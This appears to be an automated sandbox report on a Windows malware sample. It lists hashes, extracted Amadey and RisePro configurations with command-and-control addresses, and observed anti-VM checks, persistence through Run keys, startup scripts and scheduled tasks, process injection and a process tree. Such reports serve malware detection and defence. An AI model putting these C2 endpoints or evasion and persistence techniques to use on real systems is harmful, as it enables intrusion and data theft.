Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
15-05-2024 12:58
Behavioral task
behavioral1
Sample
a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
Resource
win10v2004-20240508-en
General
-
Target
a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
-
Size
1.5MB
-
MD5
32187c18a470b54095365f8db359a671
-
SHA1
3ce7f687006e176a5b1554e30decdfed60e35aae
-
SHA256
a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948
-
SHA512
a9873b6ac3f480ad881bee4fe52d960127696f816007ee1ed4a2511ff82f7cc10ec98ef16cdc2869b49b716d3453ee6a7d952a1988083d046ba05dd9d579449a
-
SSDEEP
24576:92vbP2LX8eT+onZIeV1B/0ZGP5Ulz9xw0i0sx9rNqdy5/rwjXUx68BFrgPUv:9kyweTrZIQ8o2z9ST089BqurwLI7vMcv
Malware Config
Extracted
amadey
4.20
http://5.42.96.141
http://5.42.96.7
-
install_dir
908f070dff
-
install_file
explorku.exe
-
strings_key
b25a9385246248a95c600f9a061438e1
-
url_paths
/go34ko8/index.php
Extracted
risepro
147.45.47.126:58709
Signatures
-
Detect ZGRat V1 20 IoCs
resource yara_rule behavioral2/memory/2820-111-0x0000000006820000-0x0000000006A60000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-115-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-114-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-123-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-121-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-132-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-149-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-147-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-145-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-143-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-141-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-139-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-137-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-136-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-133-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-125-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-119-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-117-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-129-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 behavioral2/memory/2820-127-0x0000000006820000-0x0000000006A5A000-memory.dmp family_zgrat_v1 -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3364 created 636 3364 powershell.EXE 5 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 18571080f2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amers.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 18571080f2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 18571080f2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amers.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs Kaxhwswfup.exe -
Executes dropped EXE 12 IoCs
pid Process 2272 explorku.exe 4436 amers.exe 1936 axplons.exe 2824 18571080f2.exe 2820 Kaxhwswfup.exe 4304 axplons.exe 1044 explorku.exe 3368 $7760c8f0 1968 explorku.exe 4412 $772f9fd5 484 axplons.exe 1288 explorku.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine amers.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine axplons.exe -
resource yara_rule behavioral2/memory/4972-0-0x00000000009D0000-0x0000000000EBC000-memory.dmp themida behavioral2/memory/4972-2-0x00000000009D0000-0x0000000000EBC000-memory.dmp themida behavioral2/memory/4972-3-0x00000000009D0000-0x0000000000EBC000-memory.dmp themida behavioral2/memory/4972-1-0x00000000009D0000-0x0000000000EBC000-memory.dmp themida behavioral2/memory/4972-5-0x00000000009D0000-0x0000000000EBC000-memory.dmp themida behavioral2/memory/4972-6-0x00000000009D0000-0x0000000000EBC000-memory.dmp themida behavioral2/memory/4972-7-0x00000000009D0000-0x0000000000EBC000-memory.dmp themida behavioral2/memory/4972-4-0x00000000009D0000-0x0000000000EBC000-memory.dmp themida behavioral2/memory/4972-8-0x00000000009D0000-0x0000000000EBC000-memory.dmp themida behavioral2/files/0x000100000002aa29-14.dat themida behavioral2/memory/4972-21-0x00000000009D0000-0x0000000000EBC000-memory.dmp themida behavioral2/memory/2272-22-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/2272-30-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/2272-27-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/2272-26-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/2272-29-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/2272-28-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/2272-24-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/2272-25-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/2272-23-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/2272-64-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/files/0x000100000002aa2e-69.dat themida behavioral2/memory/2824-83-0x0000000000CB0000-0x0000000001326000-memory.dmp themida behavioral2/memory/2824-85-0x0000000000CB0000-0x0000000001326000-memory.dmp themida behavioral2/memory/2824-86-0x0000000000CB0000-0x0000000001326000-memory.dmp themida behavioral2/memory/2824-87-0x0000000000CB0000-0x0000000001326000-memory.dmp themida behavioral2/memory/2824-84-0x0000000000CB0000-0x0000000001326000-memory.dmp themida behavioral2/memory/2824-90-0x0000000000CB0000-0x0000000001326000-memory.dmp themida behavioral2/memory/2824-91-0x0000000000CB0000-0x0000000001326000-memory.dmp themida behavioral2/memory/2824-89-0x0000000000CB0000-0x0000000001326000-memory.dmp themida behavioral2/memory/2824-88-0x0000000000CB0000-0x0000000001326000-memory.dmp themida behavioral2/memory/2272-4273-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/1044-5011-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/1044-5019-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/2824-5024-0x0000000000CB0000-0x0000000001326000-memory.dmp themida behavioral2/memory/1968-5679-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/1968-5743-0x0000000000810000-0x0000000000CFC000-memory.dmp themida behavioral2/memory/1288-5788-0x0000000000810000-0x0000000000CFC000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\18571080f2.exe = "C:\\Users\\Admin\\1000006002\\18571080f2.exe" explorku.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 18571080f2.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 4436 amers.exe 1936 axplons.exe 4304 axplons.exe 484 axplons.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2820 set thread context of 3368 2820 Kaxhwswfup.exe 90 PID 3364 set thread context of 2252 3364 powershell.EXE 93 PID 2820 set thread context of 4412 2820 Kaxhwswfup.exe 94 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\explorku.job a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe File created C:\Windows\Tasks\axplons.job amers.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 55 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715777985" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 15 May 2024 12:59:46 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={DA4A53E1-FE86-4F0F-B330-24C883B334B2}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4436 amers.exe 4436 amers.exe 1936 axplons.exe 1936 axplons.exe 4304 axplons.exe 4304 axplons.exe 3364 powershell.EXE 3364 powershell.EXE 3364 powershell.EXE 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2820 Kaxhwswfup.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe 2252 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2820 Kaxhwswfup.exe Token: SeDebugPrivilege 3364 powershell.EXE Token: SeDebugPrivilege 3364 powershell.EXE Token: SeDebugPrivilege 2252 dllhost.exe Token: SeDebugPrivilege 2820 Kaxhwswfup.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 4000 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4972 wrote to memory of 2272 4972 a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe 82 PID 4972 wrote to memory of 2272 4972 a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe 82 PID 4972 wrote to memory of 2272 4972 a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe 82 PID 2272 wrote to memory of 1968 2272 explorku.exe 83 PID 2272 wrote to memory of 1968 2272 explorku.exe 83 PID 2272 wrote to memory of 1968 2272 explorku.exe 83 PID 2272 wrote to memory of 4436 2272 explorku.exe 84 PID 2272 wrote to memory of 4436 2272 explorku.exe 84 PID 2272 wrote to memory of 4436 2272 explorku.exe 84 PID 4436 wrote to memory of 1936 4436 amers.exe 85 PID 4436 wrote to memory of 1936 4436 amers.exe 85 PID 4436 wrote to memory of 1936 4436 amers.exe 85 PID 2272 wrote to memory of 2824 2272 explorku.exe 86 PID 2272 wrote to memory of 2824 2272 explorku.exe 86 PID 2272 wrote to memory of 2824 2272 explorku.exe 86 PID 1936 wrote to memory of 2820 1936 axplons.exe 87 PID 1936 wrote to memory of 2820 1936 axplons.exe 87 PID 1936 wrote to memory of 2820 1936 axplons.exe 87 PID 2820 wrote to memory of 3368 2820 Kaxhwswfup.exe 90 PID 2820 wrote to memory of 3368 2820 Kaxhwswfup.exe 90 PID 2820 wrote to memory of 3368 2820 Kaxhwswfup.exe 90 PID 2820 wrote to memory of 3368 2820 Kaxhwswfup.exe 90 PID 2820 wrote to memory of 3368 2820 Kaxhwswfup.exe 90 PID 2820 wrote to memory of 3368 2820 Kaxhwswfup.exe 90 PID 2820 wrote to memory of 3368 2820 Kaxhwswfup.exe 90 PID 2820 wrote to memory of 3368 2820 Kaxhwswfup.exe 90 PID 2820 wrote to memory of 3368 2820 Kaxhwswfup.exe 90 PID 3364 wrote to memory of 2252 3364 powershell.EXE 93 PID 3364 wrote to memory of 2252 3364 powershell.EXE 93 PID 3364 wrote to memory of 2252 3364 powershell.EXE 93 PID 3364 wrote to memory of 2252 3364 powershell.EXE 93 PID 3364 wrote to memory of 2252 3364 powershell.EXE 93 PID 3364 wrote to memory of 2252 3364 powershell.EXE 93 PID 3364 wrote to memory of 2252 3364 powershell.EXE 93 PID 3364 wrote to memory of 2252 3364 powershell.EXE 93 PID 2252 wrote to memory of 636 2252 dllhost.exe 5 PID 2252 wrote to memory of 692 2252 dllhost.exe 7 PID 2252 wrote to memory of 992 2252 dllhost.exe 12 PID 2252 wrote to memory of 560 2252 dllhost.exe 13 PID 2252 wrote to memory of 436 2252 dllhost.exe 14 PID 2252 wrote to memory of 756 2252 dllhost.exe 15 PID 2252 wrote to memory of 1072 2252 dllhost.exe 16 PID 2252 wrote to memory of 1080 2252 dllhost.exe 17 PID 2252 wrote to memory of 1200 2252 dllhost.exe 19 PID 2252 wrote to memory of 1220 2252 dllhost.exe 20 PID 2252 wrote to memory of 1272 2252 dllhost.exe 21 PID 2252 wrote to memory of 1320 2252 dllhost.exe 22 PID 2252 wrote to memory of 1448 2252 dllhost.exe 23 PID 2252 wrote to memory of 1456 2252 dllhost.exe 24 PID 2252 wrote to memory of 1516 2252 dllhost.exe 25 PID 2252 wrote to memory of 1572 2252 dllhost.exe 26 PID 2252 wrote to memory of 1592 2252 dllhost.exe 27 PID 2252 wrote to memory of 1716 2252 dllhost.exe 28 PID 2252 wrote to memory of 1732 2252 dllhost.exe 29 PID 2252 wrote to memory of 1776 2252 dllhost.exe 30 PID 2252 wrote to memory of 1828 2252 dllhost.exe 31 PID 2252 wrote to memory of 1892 2252 dllhost.exe 32 PID 2252 wrote to memory of 1528 2252 dllhost.exe 33 PID 2252 wrote to memory of 1676 2252 dllhost.exe 34 PID 2252 wrote to memory of 1984 2252 dllhost.exe 35 PID 2252 wrote to memory of 2072 2252 dllhost.exe 36 PID 2252 wrote to memory of 2140 2252 dllhost.exe 37 PID 2252 wrote to memory of 2244 2252 dllhost.exe 39 PID 2252 wrote to memory of 2352 2252 dllhost.exe 40
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:636
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:560
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b8377828-929b-43ee-9f69-7bf2a579ed36}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4304
-
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1044
-
-
